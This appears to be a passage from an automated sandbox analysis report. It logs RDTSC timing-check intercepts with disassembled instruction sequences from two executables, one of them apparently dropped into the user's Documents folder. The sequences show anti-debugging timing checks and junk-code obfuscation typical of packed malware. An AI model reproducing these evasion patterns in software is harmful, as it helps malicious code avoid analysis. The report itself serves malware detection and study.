Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60405 second address: 4B60462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, 7180h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FC3A8C83B46h 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov esi, 5CFAB99Dh 0x0000001d mov esi, 34CE5299h 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 call 00007FC3A8C83B41h 0x0000002d pop ecx 0x0000002e mov bh, C8h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60462 second address: 4B60469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60469 second address: 4B60476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60476 second address: 4B6047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B6047A second address: 4B60484 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60484 second address: 4B60488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B604B1 second address: 4B604C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov ecx, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 44F50556h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B604C6 second address: 4B604E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C81777h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B604E2 second address: 4B6050B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov bh, 3Bh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 3013197Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC3A8C83B44h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B6050B second address: 4B6051A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C8176Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B6051A second address: 4B60520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60520 second address: 4B60524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60649 second address: 4B6064F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B6064F second address: 4B60653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60653 second address: 4B60657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60657 second address: 4B6068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, dword ptr [ebp+08h] 0x0000000b jmp 00007FC3A8C81777h 0x00000010 dec edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC3A8C81770h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B6068E second address: 4B60694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60694 second address: 4B606A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C8176Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B606A5 second address: 4B606A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B606A9 second address: 4B606EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ebx, dword ptr [edi+01h] 0x0000000b pushad 0x0000000c mov cl, dh 0x0000000e push eax 0x0000000f pushfd 0x00000010 jmp 00007FC3A8C8176Bh 0x00000015 and cx, CF5Eh 0x0000001a jmp 00007FC3A8C81779h 0x0000001f popfd 0x00000020 pop esi 0x00000021 popad 0x00000022 mov al, byte ptr [edi+01h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B606EE second address: 4B606F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B606F2 second address: 4B606F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B606F6 second address: 4B606FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B606FC second address: 4B607C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC3A8C8176Dh 0x00000009 sbb ax, 3846h 0x0000000e jmp 00007FC3A8C81771h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 inc edi 0x00000018 jmp 00007FC3A8C8176Eh 0x0000001d test al, al 0x0000001f jmp 00007FC3A8C81770h 0x00000024 jne 00007FC418F09A9Dh 0x0000002a pushad 0x0000002b jmp 00007FC3A8C8176Dh 0x00000030 popad 0x00000031 mov ecx, edx 0x00000033 jmp 00007FC3A8C8176Eh 0x00000038 shr ecx, 02h 0x0000003b jmp 00007FC3A8C81770h 0x00000040 rep movsd 0x00000042 rep movsd 0x00000044 rep movsd 0x00000046 rep movsd 0x00000048 rep movsd 0x0000004a jmp 00007FC3A8C81770h 0x0000004f mov ecx, edx 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 mov ah, dh 0x00000056 pushfd 0x00000057 jmp 00007FC3A8C81776h 0x0000005c sbb ah, 00000038h 0x0000005f jmp 00007FC3A8C8176Bh 0x00000064 popfd 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B607C0 second address: 4B607D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C83B44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B607D8 second address: 4B6083B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C8176Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 03h 0x0000000e jmp 00007FC3A8C81776h 0x00000013 rep movsb 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dx, 2A10h 0x0000001c pushfd 0x0000001d jmp 00007FC3A8C81779h 0x00000022 and cl, FFFFFF96h 0x00000025 jmp 00007FC3A8C81771h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B6083B second address: 4B60884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 pushfd 0x00000006 jmp 00007FC3A8C83B43h 0x0000000b adc esi, 4B0261CEh 0x00000011 jmp 00007FC3A8C83B49h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60884 second address: 4B60888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60888 second address: 4B6089B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B6089B second address: 4B608A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B608A1 second address: 4B608A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B608A5 second address: 4B60909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C8176Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, ebx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC3A8C81774h 0x00000014 or cx, F7D8h 0x00000019 jmp 00007FC3A8C8176Bh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007FC3A8C81776h 0x00000027 xor si, 4238h 0x0000002c jmp 00007FC3A8C8176Bh 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60909 second address: 4B60933 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ecx, dword ptr [ebp-10h] 0x0000000b jmp 00007FC3A8C83B42h 0x00000010 mov dword ptr fs:[00000000h], ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60933 second address: 4B60939 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60939 second address: 4B60948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C83B3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60948 second address: 4B604B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C81779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c jmp 00007FC3A8C8176Eh 0x00000011 pop edi 0x00000012 pushad 0x00000013 call 00007FC3A8C8176Eh 0x00000018 call 00007FC3A8C81772h 0x0000001d pop eax 0x0000001e pop edx 0x0000001f pushfd 0x00000020 jmp 00007FC3A8C81770h 0x00000025 sbb esi, 7FF512E8h 0x0000002b jmp 00007FC3A8C8176Bh 0x00000030 popfd 0x00000031 popad 0x00000032 pop esi 0x00000033 jmp 00007FC3A8C81776h 0x00000038 pop ebx 0x00000039 pushad 0x0000003a mov bx, ax 0x0000003d popad 0x0000003e leave 0x0000003f jmp 00007FC3A8C81774h 0x00000044 retn 0008h 0x00000047 cmp dword ptr [ebp-2Ch], 10h 0x0000004b mov eax, dword ptr [ebp-40h] 0x0000004e jnc 00007FC3A8C81765h 0x00000050 push eax 0x00000051 lea edx, dword ptr [ebp-00000590h] 0x00000057 push edx 0x00000058 call esi 0x0000005a push 00000008h 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FC3A8C81778h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60B6B second address: 4B60B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B60B70 second address: 4B60B76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 50E332 second address: 50E338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 529684 second address: 52968A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 52968A second address: 5296B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop esi 0x00000009 pushad 0x0000000a jmp 00007FC3A8C83B48h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 5296B4 second address: 5296BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 52982C second address: 52983D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC3A8C83B3Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 5299F8 second address: 529A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FC3A8C81778h 0x0000000a jmp 00007FC3A8C81775h 0x0000000f pushad 0x00000010 jmp 00007FC3A8C81772h 0x00000015 jnp 00007FC3A8C81766h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 529BA8 second address: 529BC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B44h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FC3A8C83B36h 0x0000000f rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 52B86A second address: 52B874 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC3A8C81766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 52BBBE second address: 52BC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FC3A8C83B38h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D1CFFh], esi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007FC3A8C83B38h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D36CCh], edi 0x0000004b push 573F38DDh 0x00000050 jg 00007FC3A8C83B4Dh 0x00000056 xor dword ptr [esp], 573F385Dh 0x0000005d push 00000003h 0x0000005f call 00007FC3A8C83B3Dh 0x00000064 jnp 00007FC3A8C83B3Ch 0x0000006a pop edx 0x0000006b push 00000000h 0x0000006d sub dword ptr [ebp+122D3655h], eax 0x00000073 push 00000003h 0x00000075 jmp 00007FC3A8C83B3Eh 0x0000007a push 88ECA5DBh 0x0000007f pushad 0x00000080 jmp 00007FC3A8C83B45h 0x00000085 jc 00007FC3A8C83B3Ch 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 52BC92 second address: 52BCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 37135A25h 0x0000000c sub dword ptr [ebp+122D1CFAh], ecx 0x00000012 lea ebx, dword ptr [ebp+12450750h] 0x00000018 or edi, dword ptr [ebp+122D1F89h] 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 52BCB5 second address: 52BCC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 52BCC0 second address: 52BCD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C8176Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 52BCD6 second address: 52BCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C83B46h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 54B284 second address: 54B2B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FC3A8C8177Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 54B2B2 second address: 54B2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC3A8C83B36h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FC3A8C83B46h 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007FC3A8C83B36h 0x00000019 jno 00007FC3A8C83B36h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 54B73E second address: 54B748 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC3A8C81766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 54BD1B second address: 54BD1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 54BE5D second address: 54BE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 54CD77 second address: 54CD8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 54F50E second address: 54F512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 54F512 second address: 54F549 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FC3A8C83B50h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 5523C0 second address: 5523CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC3A8C81766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55698E second address: 556999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 556999 second address: 5569CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC3A8C81766h 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FC3A8C8176Dh 0x0000001c jns 00007FC3A8C81768h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 50AC74 second address: 50AC7D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55A4C1 second address: 55A4C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55A4C5 second address: 55A4E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC3A8C83B44h 0x0000000f rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55A5D8 second address: 55A5EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C8176Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55A5EA second address: 55A62A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC3A8C83B3Eh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FC3A8C83B46h 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55A62A second address: 55A62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55A818 second address: 55A822 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC3A8C83B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 519F44 second address: 519F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 519F4C second address: 519F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 519F54 second address: 519F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 56012F second address: 56015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C83B41h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007FC3A8C83B3Fh 0x00000015 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 56015A second address: 560166 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC3A8C81766h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55F7FD second address: 55F807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC3A8C83B36h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55F986 second address: 55F98D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55F98D second address: 55F9A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC3A8C83B36h 0x00000009 jng 00007FC3A8C83B36h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55FC2D second address: 55FC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55FC31 second address: 55FC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
